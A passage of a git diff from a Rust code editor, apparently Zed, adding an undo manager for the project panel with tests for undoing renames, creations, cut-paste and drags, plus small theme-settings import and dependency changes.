editor.set_text("new_dir", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/new_dir", cx).is_some(), + "New directory should exist" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + find_project_entry(&panel, "root/new_dir", cx), + None, + "New directory should be removed after undo" + ); +} + +#[gpui::test] +async fn test_undo_cut_paste(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "file.txt": "content", + }, + "dst": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "root/src", cx); + + select_path_with_mark(&panel, "root/src/file.txt", cx); + panel.update_in(cx, |panel, window, cx| { + panel.cut(&Default::default(), window, cx); + }); + + select_path(&panel, "root/dst", cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/dst/file.txt", cx).is_some(), + "File should be moved to dst" + ); + assert_eq!( + find_project_entry(&panel, "root/src/file.txt", cx), + None, + "File should no longer be in src" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/src/file.txt", cx).is_some(), + "File should be back in src after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/file.txt", cx), + None, + "File should no longer be in dst after undo" + ); +} + +#[gpui::test] +async fn test_undo_drag_single_entry(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "main.rs": "", + }, + "dst": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "root/src", cx); + + panel.update(cx, |panel, _| panel.marked_entries.clear()); + select_path_with_mark(&panel, "root/src/main.rs", cx); + drag_selection_to(&panel, "root/dst", false, cx); + + assert!( + find_project_entry(&panel, "root/dst/main.rs", cx).is_some(), + "File should be in dst after drag" + ); + assert_eq!( + find_project_entry(&panel, "root/src/main.rs", cx), + None, + "File should no longer be in src after drag" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/src/main.rs", cx).is_some(), + "File should be back in src after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/main.rs", cx), + None, + "File should no longer be in dst after undo" + ); +} + +#[gpui::test] +async fn test_undo_drag_multiple_entries(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "alpha.txt": "", + "beta.txt": "", + }, + "dst": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "root/src", cx); + + panel.update(cx, |panel, _| panel.marked_entries.clear()); + select_path_with_mark(&panel, "root/src/alpha.txt", cx); + select_path_with_mark(&panel, "root/src/beta.txt", cx); + drag_selection_to(&panel, "root/dst", false, cx); + + assert!( + find_project_entry(&panel, "root/dst/alpha.txt", cx).is_some(), + "alpha.txt should be in dst after drag" + ); + assert!( + find_project_entry(&panel, "root/dst/beta.txt", cx).is_some(), + "beta.txt should be in dst after drag" + ); + + // A single undo should revert the entire batch + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/src/alpha.txt", cx).is_some(), + "alpha.txt should be back in src after undo" + ); + assert!( + find_project_entry(&panel, "root/src/beta.txt", cx).is_some(), + "beta.txt should be back in src after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/alpha.txt", cx), + None, + "alpha.txt should no longer be in dst after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/dst/beta.txt", cx), + None, + "beta.txt should no longer be in dst after undo" + ); +} + +#[gpui::test] +async fn test_multiple_sequential_undos(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "a.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root/a.txt", cx); + panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx)); + cx.run_until_parked(); + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("b.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!(find_project_entry(&panel, "root/b.txt", cx).is_some()); + + select_path(&panel, "root", cx); + panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx)); + cx.run_until_parked(); + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("c.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!(find_project_entry(&panel, "root/b.txt", cx).is_some()); + assert!(find_project_entry(&panel, "root/c.txt", cx).is_some()); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + find_project_entry(&panel, "root/c.txt", cx), + None, + "c.txt should be removed after first undo" + ); + assert!( + find_project_entry(&panel, "root/b.txt", cx).is_some(), + "b.txt should still exist after first undo" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/a.txt", cx).is_some(), + "a.txt should be restored after second undo" + ); + assert_eq!( + find_project_entry(&panel, "root/b.txt", cx), + None, + "b.txt should no longer exist after second undo" + ); +} + +#[gpui::test] +async fn test_undo_with_empty_stack(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "a.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/a.txt", cx).is_some(), + "File tree should be unchanged after undo on empty stack" + ); +} + +#[gpui::test] +async fn test_undo_batch(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "src": { + "main.rs": "// Code!" + } + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + let worktree_id = project.update(cx, |project, cx| { + project.visible_worktrees(cx).next().unwrap().read(cx).id() + }); + cx.run_until_parked(); + + // Since there currently isn't a way to both create a folder and the file + // within it as two separate operations batched under the same + // `ProjectPanelOperation::Batch` operation, we'll simply record those + // ourselves, knowing that the filesystem already has the folder and file + // being provided in the operations. + panel.update(cx, |panel, _cx| { + panel.undo_manager.record_batch(vec![ + ProjectPanelOperation::Create { + project_path: ProjectPath { + worktree_id, + path: Arc::from(rel_path("src/main.rs")), + }, + }, + ProjectPanelOperation::Create { + project_path: ProjectPath { + worktree_id, + path: Arc::from(rel_path("src/")), + }, + }, + ]); + }); + + // Ensure that `src/main.rs` is present in the filesystem before proceeding, + // otherwise this test is irrelevant. + assert_eq!(fs.files(), vec![PathBuf::from(path!("/root/src/main.rs"))]); + assert_eq!( + fs.directories(false), + vec![ + PathBuf::from(path!("/")), + PathBuf::from(path!("/root/")), + PathBuf::from(path!("/root/src/")) ] ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!(fs.files().len(), 0); + assert_eq!( + fs.directories(false), + vec![PathBuf::from(path!("/")), PathBuf::from(path!("/root/"))] + ); } #[gpui::test] -async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) { +async fn test_paste_external_paths(cx: &mut gpui::TestAppContext) { init_test(cx); + set_auto_open_settings( + cx, + ProjectPanelAutoOpenSettings { + on_drop: Some(false), + ..Default::default() + }, + ); let fs = FakeFs::new(cx.executor()); fs.insert_tree( - "/test", + path!("/root"), json!({ - "dir1": { - "a.txt": "", - "b.txt": "", - }, - "dir2": {}, - "c.txt": "", - "d.txt": "", + "subdir": {} }), ) .await; - let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + fs.insert_tree( + path!("/external"), + json!({ + "new_file.rs": "fn main() {}" + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); let workspace = window .read_with(cx, |mw, _| mw.workspace().clone()) @@ -1792,107 +2580,43 @@ async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppConte let panel = workspace.update_in(cx, ProjectPanel::new); cx.run_until_parked(); - toggle_expand_dir(&panel, "test/dir1", cx); - - cx.simulate_modifiers_change(gpui::Modifiers { - control: true, - ..Default::default() - }); - - select_path_with_mark(&panel, "test/dir1", cx); - select_path_with_mark(&panel, "test/c.txt", cx); - - assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt", - " b.txt", - " > dir2", - " c.txt <== selected <== marked", - " d.txt", - ], - "Initial state before copying dir1 and c.txt" - ); - - panel.update_in(cx, |panel, window, cx| { - panel.copy(&Default::default(), window, cx); - }); - select_path(&panel, "test/dir2", cx); - panel.update_in(cx, |panel, window, cx| { - panel.paste(&Default::default(), window, cx); + cx.write_to_clipboard(ClipboardItem { + entries: vec![GpuiClipboardEntry::ExternalPaths(ExternalPaths( + smallvec::smallvec![PathBuf::from(path!("/external/new_file.rs"))], + ))], }); - cx.executor().run_until_parked(); - - toggle_expand_dir(&panel, "test/dir2/dir1", cx); - - assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt", - " b.txt", - " v dir2", - " v dir1 <== selected", - " a.txt", - " b.txt", - " c.txt", - " c.txt <== marked", - " d.txt", - ], - "Should copy dir1 as well as c.txt into dir2" - ); - // Disambiguating multiple files should not open the rename editor. - select_path(&panel, "test/dir2", cx); + select_path(&panel, "root/subdir", cx); panel.update_in(cx, |panel, window, cx| { panel.paste(&Default::default(), window, cx); }); cx.executor().run_until_parked(); assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), + visible_entries_as_strings(&panel, 0..50, cx), &[ - "v test", - " v dir1 <== marked", - " a.txt", - " b.txt", - " v dir2", - " v dir1", - " a.txt", - " b.txt", - " > dir1 copy <== selected", - " c.txt", - " c copy.txt", - " c.txt <== marked", - " d.txt", + "v root", + " v subdir", + " new_file.rs <== selected", ], - "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor" ); } #[gpui::test] -async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) { +async fn test_copy_and_cut_write_to_system_clipboard(cx: &mut gpui::TestAppContext) { init_test(cx); let fs = FakeFs::new(cx.executor()); fs.insert_tree( - "/test", + path!("/root"), json!({ - "dir1": { - "a.txt": "", - "b.txt": "", - }, - "dir2": {}, - "c.txt": "", - "d.txt": "", + "file_a.txt": "", + "file_b.txt": "" }), ) .await; - let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); let workspace = window .read_with(cx, |mw, _| mw.workspace().clone()) @@ -1901,58 +2625,32 @@ async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) let panel = workspace.update_in(cx, ProjectPanel::new); cx.run_until_parked(); - toggle_expand_dir(&panel, "test/dir1", cx); - - cx.simulate_modifiers_change(gpui::Modifiers { - control: true, - ..Default::default() + select_path(&panel, "root/file_a.txt", cx); + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); }); - select_path_with_mark(&panel, "test/dir1/a.txt", cx); - select_path_with_mark(&panel, "test/dir1", cx); - select_path_with_mark(&panel, "test/c.txt", cx); - - assert_eq!( - visible_entries_as_strings(&panel, 0..15, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt <== marked", - " b.txt", - " > dir2", - " c.txt <== selected <== marked", - " d.txt", - ], - "Initial state before copying a.txt, dir1 and c.txt" + let clipboard = cx + .read_from_clipboard() + .expect("clipboard should have content after copy"); + let text = clipboard.text().expect("clipboard should contain text"); + assert!( + text.contains("file_a.txt"), + "System clipboard should contain the copied file path, got: {text}" ); + select_path(&panel, "root/file_b.txt", cx); panel.update_in(cx, |panel, window, cx| { - panel.copy(&Default::default(), window, cx); - }); - select_path(&panel, "test/dir2", cx); - panel.update_in(cx, |panel, window, cx| { - panel.paste(&Default::default(), window, cx); + panel.cut(&Default::default(), window, cx); }); - cx.executor().run_until_parked(); - - toggle_expand_dir(&panel, "test/dir2/dir1", cx); - assert_eq!( - visible_entries_as_strings(&panel, 0..20, cx), - &[ - "v test", - " v dir1 <== marked", - " a.txt <== marked", - " b.txt", - " v dir2", - " v dir1 <== selected", - " a.txt", - " b.txt", - " c.txt", - " c.txt <== marked", - " d.txt", - ], - "Should copy dir1 and c.txt into dir2. a.txt is already present in copied dir1." + let clipboard = cx + .read_from_clipboard() + .expect("clipboard should have content after cut"); + let text = clipboard.text().expect("clipboard should contain text"); + assert!( + text.contains("file_b.txt"), + "System clipboard should contain the cut file path, got: {text}" ); } @@ -4412,6 +5110,90 @@ async fn test_drag_marked_entries_in_folded_directories(cx: &mut gpui::TestAppCo ); } +#[gpui::test] +async fn test_dragging_same_named_files_preserves_one_source_on_conflict( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "dir_a": { + "shared.txt": "from a" + }, + "dir_b": { + "shared.txt": "from b" + } + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + panel.update_in(cx, |panel, window, cx| { + let (root_entry_id, worktree_id, entry_a_id, entry_b_id) = { + let worktree = panel.project.read(cx).visible_worktrees(cx).next().unwrap(); + let worktree = worktree.read(cx); + let root_entry_id = worktree.root_entry().unwrap().id; + let worktree_id = worktree.id(); + let entry_a_id = worktree + .entry_for_path(rel_path("dir_a/shared.txt")) + .unwrap() + .id; + let entry_b_id = worktree + .entry_for_path(rel_path("dir_b/shared.txt")) + .unwrap() + .id; + (root_entry_id, worktree_id, entry_a_id, entry_b_id) + }; + + let drag = DraggedSelection { + active_selection: SelectedEntry { + worktree_id, + entry_id: entry_a_id, + }, + marked_selections: Arc::new([ + SelectedEntry { + worktree_id, + entry_id: entry_a_id, + }, + SelectedEntry { + worktree_id, + entry_id: entry_b_id, + }, + ]), + }; + + panel.drag_onto(&drag, root_entry_id, false, window, cx); + }); + cx.executor().run_until_parked(); + + let files = fs.files(); + assert!(files.contains(&PathBuf::from(path!("/root/shared.txt")))); + + let remaining_sources = [ + PathBuf::from(path!("/root/dir_a/shared.txt")), + PathBuf::from(path!("/root/dir_b/shared.txt")), + ] + .into_iter() + .filter(|path| files.contains(path)) + .count(); + + assert_eq!( + remaining_sources, 1, + "one conflicting source file should remain in place" + ); +} + #[gpui::test] async fn test_drag_entries_between_different_worktrees(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -8586,6 +9368,55 @@ async fn test_compare_files_context_menu(cx: &mut gpui::TestAppContext) { } } +#[gpui::test] +async fn test_reveal_in_file_manager_path_falls_back_to_worktree_root( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "file.txt": "content", + "dir": {}, + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root/file.txt", cx); + let selected_reveal_path = panel + .update(cx, |panel, cx| panel.reveal_in_file_manager_path(cx)) + .expect("selected entry should produce a reveal path"); + assert!( + selected_reveal_path.ends_with(Path::new("file.txt")), + "Expected selected file path, got {:?}", + selected_reveal_path + ); + + panel.update(cx, |panel, _| { + panel.selection = None; + panel.marked_entries.clear(); + }); + let fallback_reveal_path = panel + .update(cx, |panel, cx| panel.reveal_in_file_manager_path(cx)) + .expect("project root should be used when selection is empty"); + assert!( + fallback_reveal_path.ends_with(Path::new("root")), + "Expected worktree root path, got {:?}", + fallback_reveal_path + ); +} + #[gpui::test] async fn test_hide_hidden_entries(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -9593,11 +10424,11 @@ async fn run_create_file_in_folded_path_case( } } -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); crate::init(cx); cx.update_global::(|store, cx| { @@ -9615,7 +10446,7 @@ fn init_test(cx: &mut TestAppContext) { fn init_test_with_editor(cx: &mut TestAppContext) { cx.update(|cx| { let app_state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); workspace::init(app_state, cx); diff --git a/crates/project_panel/src/undo.rs b/crates/project_panel/src/undo.rs new file mode 100644 index 0000000000000000000000000000000000000000..3a8baa23c55db8f3572174ee667196936e633281 --- /dev/null +++ b/crates/project_panel/src/undo.rs @@ -0,0 +1,286 @@ +use anyhow::anyhow; +use gpui::{AppContext, SharedString, Task, WeakEntity}; +use project::ProjectPath; +use std::collections::VecDeque; +use ui::{App, IntoElement, Label, ParentElement, Styled, v_flex}; +use workspace::{ + Workspace, + notifications::{NotificationId, simple_message_notification::MessageNotification}, +}; + +const MAX_UNDO_OPERATIONS: usize = 10_000; + +#[derive(Clone)] +pub enum ProjectPanelOperation { + Batch(Vec), + Create { + project_path: ProjectPath, + }, + Rename { + old_path: ProjectPath, + new_path: ProjectPath, + }, +} + +pub struct UndoManager { + workspace: WeakEntity, + stack: VecDeque, + /// Maximum number of operations to keep on the undo stack. + limit: usize, +} + +impl UndoManager { + pub fn new(workspace: WeakEntity) -> Self { + Self::new_with_limit(workspace, MAX_UNDO_OPERATIONS) + } + + pub fn new_with_limit(workspace: WeakEntity, limit: usize) -> Self { + Self { + workspace, + limit, + stack: VecDeque::new(), + } + } + + pub fn can_undo(&self) -> bool { + !self.stack.is_empty() + } + + pub fn undo(&mut self, cx: &mut App) { + if let Some(operation) = self.stack.pop_back() { + let task = self.revert_operation(operation, cx); + let workspace = self.workspace.clone(); + + cx.spawn(async move |cx| { + let errors = task.await; + if !errors.is_empty() { + cx.update(|cx| { + let messages = errors + .iter() + .map(|err| SharedString::from(err.to_string())) + .collect(); + + Self::show_errors(workspace, messages, cx) + }) + } + }) + .detach(); + } + } + + pub fn record(&mut self, operation: ProjectPanelOperation) { + if self.stack.len() >= self.limit { + self.stack.pop_front(); + } + + self.stack.push_back(operation); + } + + pub fn record_batch(&mut self, operations: impl IntoIterator) { + let mut operations = operations.into_iter().collect::>(); + let operation = match operations.len() { + 0 => return, + 1 => operations.pop().unwrap(), + _ => ProjectPanelOperation::Batch(operations), + }; + + self.record(operation); + } + + /// Attempts to revert the provided `operation`, returning a vector of errors + /// in case there was any failure while reverting the operation. + /// + /// For all operations other than [`crate::undo::ProjectPanelOperation::Batch`], a maximum + /// of one error is returned. + fn revert_operation( + &self, + operation: ProjectPanelOperation, + cx: &mut App, + ) -> Task> { + match operation { + ProjectPanelOperation::Create { project_path } => { + let Some(workspace) = self.workspace.upgrade() else { + return Task::ready(vec![anyhow!("Failed to obtain workspace.")]); + }; + + let result = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + let entry_id = project + .entry_for_path(&project_path, cx) + .map(|entry| entry.id) + .ok_or_else(|| anyhow!("No entry for path."))?; + + project + .delete_entry(entry_id, true, cx) + .ok_or_else(|| anyhow!("Failed to trash entry.")) + }) + }); + + let task = match result { + Ok(task) => task, + Err(err) => return Task::ready(vec![err]), + }; + + cx.spawn(async move |_| match task.await { + Ok(_) => vec![], + Err(err) => vec![err], + }) + } + ProjectPanelOperation::Rename { old_path, new_path } => { + let Some(workspace) = self.workspace.upgrade() else { + return Task::ready(vec![anyhow!("Failed to obtain workspace.")]); + }; + + let result = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + let entry_id = project + .entry_for_path(&new_path, cx) + .map(|entry| entry.id) + .ok_or_else(|| anyhow!("No entry for path."))?; + + Ok(project.rename_entry(entry_id, old_path.clone(), cx)) + }) + }); + + let task = match result { + Ok(task) => task, + Err(err) => return Task::ready(vec![err]), + }; + + cx.spawn(async move |_| match task.await { + Ok(_) => vec![], + Err(err) => vec![err], + }) + } + ProjectPanelOperation::Batch(operations) => { + // When reverting operations in a batch, we reverse the order of + // operations to handle dependencies between them. For example, + // if a batch contains the following order of operations: + // + // 1. Create `src/` + // 2. Create `src/main.rs` + // + // If we first try to revert the directory creation, it would + // fail because there's still files inside the directory. + // Operations are also reverted sequentially in order to avoid + // this same problem. + let tasks: Vec<_> = operations + .into_iter() + .rev() + .map(|operation| self.revert_operation(operation, cx)) + .collect(); + + cx.spawn(async move |_| { + let mut errors = Vec::new(); + for task in tasks { + errors.extend(task.await); + } + errors + }) + } + } + } + + /// Displays a notification with the list of provided errors ensuring that, + /// when more than one error is provided, which can be the case when dealing + /// with undoing a [`crate::undo::ProjectPanelOperation::Batch`], a list is + /// displayed with each of the errors, instead of a single message. + fn show_errors(workspace: WeakEntity, messages: Vec, cx: &mut App) { + workspace + .update(cx, move |workspace, cx| { + let notification_id = + NotificationId::Named(SharedString::new_static("project_panel_undo")); + + workspace.show_notification(notification_id, cx, move |cx| { + cx.new(|cx| { + if let [err] = messages.as_slice() { + MessageNotification::new(err.to_string(), cx) + .with_title("Failed to undo Project Panel Operation") + } else { + MessageNotification::new_from_builder(cx, move |_, _| { + v_flex() + .gap_1() + .children( + messages + .iter() + .map(|message| Label::new(format!("- {message}"))), + ) + .into_any_element() + }) + .with_title("Failed to undo Project Panel Operations") + } + }) + }) + }) + .ok(); + } +} + +#[cfg(test)] +mod test { + use crate::{ + ProjectPanel, project_panel_tests, + undo::{ProjectPanelOperation, UndoManager}, + }; + use gpui::{Entity, TestAppContext, VisualTestContext}; + use project::{FakeFs, Project, ProjectPath}; + use std::sync::Arc; + use util::rel_path::rel_path; + use workspace::MultiWorkspace; + + struct TestContext { + project: Entity, + panel: Entity, + } + + async fn init_test(cx: &mut TestAppContext) -> TestContext { + project_panel_tests::init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + TestContext { project, panel } + } + + #[gpui::test] + async fn test_limit(cx: &mut TestAppContext) { + let test_context = init_test(cx).await; + let worktree_id = test_context.project.update(cx, |project, cx| { + project.visible_worktrees(cx).next().unwrap().read(cx).id() + }); + + let build_create_operation = |file_name: &str| ProjectPanelOperation::Create { + project_path: ProjectPath { + path: Arc::from(rel_path(file_name)), + worktree_id, + }, + }; + + // Since we're updating the `ProjectPanel`'s undo manager with one whose + // limit is 3 operations, we only need to create 4 operations which + // we'll record, in order to confirm that the oldest operation is + // evicted. + let operation_a = build_create_operation("file_a.txt"); + let operation_b = build_create_operation("file_b.txt"); + let operation_c = build_create_operation("file_c.txt"); + let operation_d = build_create_operation("file_d.txt"); + + test_context.panel.update(cx, move |panel, _cx| { + panel.undo_manager = UndoManager::new_with_limit(panel.workspace.clone(), 3); + panel.undo_manager.record(operation_a); + panel.undo_manager.record(operation_b); + panel.undo_manager.record(operation_c); + panel.undo_manager.record(operation_d); + + assert_eq!(panel.undo_manager.stack.len(), 3); + }); + } +} diff --git a/crates/project_symbols/Cargo.toml b/crates/project_symbols/Cargo.toml index 83e3cb587d46a5bddf1c8b30c593c18a9b131ad2..da23116e83b465a3ad1aace883d2abb15ad9aa9b 100644 --- a/crates/project_symbols/Cargo.toml +++ b/crates/project_symbols/Cargo.toml @@ -23,6 +23,7 @@ project.workspace = true serde_json.workspace = true settings.workspace = true theme.workspace = true +theme_settings.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/project_symbols/src/project_symbols.rs b/crates/project_symbols/src/project_symbols.rs index d62935ab3819d2e6857c233a863af434f60f93a3..931e332d93d869bc31909643190d5b35f32409dc 100644 --- a/crates/project_symbols/src/project_symbols.rs +++ b/crates/project_symbols/src/project_symbols.rs @@ -9,7 +9,8 @@ use picker::{Picker, PickerDelegate}; use project::{Project, Symbol, lsp_store::SymbolLocation}; use settings::Settings; use std::{cmp::Reverse, sync::Arc}; -use theme::{ActiveTheme, ThemeSettings}; +use theme::ActiveTheme; +use theme_settings::ThemeSettings; use util::ResultExt; use workspace::{ Workspace, @@ -139,11 +140,20 @@ impl PickerDelegate for ProjectSymbolsDelegate { ); editor.update(cx, |editor, cx| { + let multibuffer_snapshot = editor.buffer().read(cx).snapshot(cx); + let Some(buffer_snapshot) = multibuffer_snapshot.as_singleton() else { + return; + }; + let text_anchor = buffer_snapshot.anchor_before(position); + let Some(anchor) = multibuffer_snapshot.anchor_in_buffer(text_anchor) + else { + return; + }; editor.change_selections( SelectionEffects::scroll(Autoscroll::center()), window, cx, - |s| s.select_ranges([position..position]), + |s| s.select_ranges([anchor..anchor]), ); }); })?; @@ -477,7 +487,7 @@ mod tests { cx.update(|cx| { let store = SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); release_channel::init(semver::Version::new(0, 0, 0), cx); editor::init(cx); }); diff --git a/crates/prompt_store/src/prompts.rs b/crates/prompt_store/src/prompts.rs index 6a845bb8dd394f8a1ff26a8a0e130156a2a158bd..b0052947c44445be37f99e99cf723d5aa53c5008 100644 --- a/crates/prompt_store/src/prompts.rs +++ b/crates/prompt_store/src/prompts.rs @@ -26,9 +26,9 @@ pub const RULES_FILE_NAMES: &[&str] = &[ ".windsurfrules", ".clinerules", ".github/copilot-instructions.md", - "CLAUDE.md", "AGENT.md", "AGENTS.md", + "CLAUDE.md", "GEMINI.md", ]; diff --git a/crates/proto/Cargo.toml b/crates/proto/Cargo.toml index 5b5b8b985cbc102cc451050403cff2e3699f612f..dfa4166f2077aea60aa87084af4918c92882f2df 100644 --- a/crates/proto/Cargo.toml +++ b/crates/proto/Cargo.toml @@ -7,7 +7,7 @@ publish.workspace = true license = "GPL-3.0-or-later" [features] -test-support = ["collections/test-support"] +test-support = [] [lints] workspace = true @@ -25,5 +25,3 @@ serde.workspace = true prost-build.workspace = true [dev-dependencies] -collections = { workspace = true, features = ["test-support"] } -typed-path = "0.11" diff --git a/crates/proto/proto/ai.proto 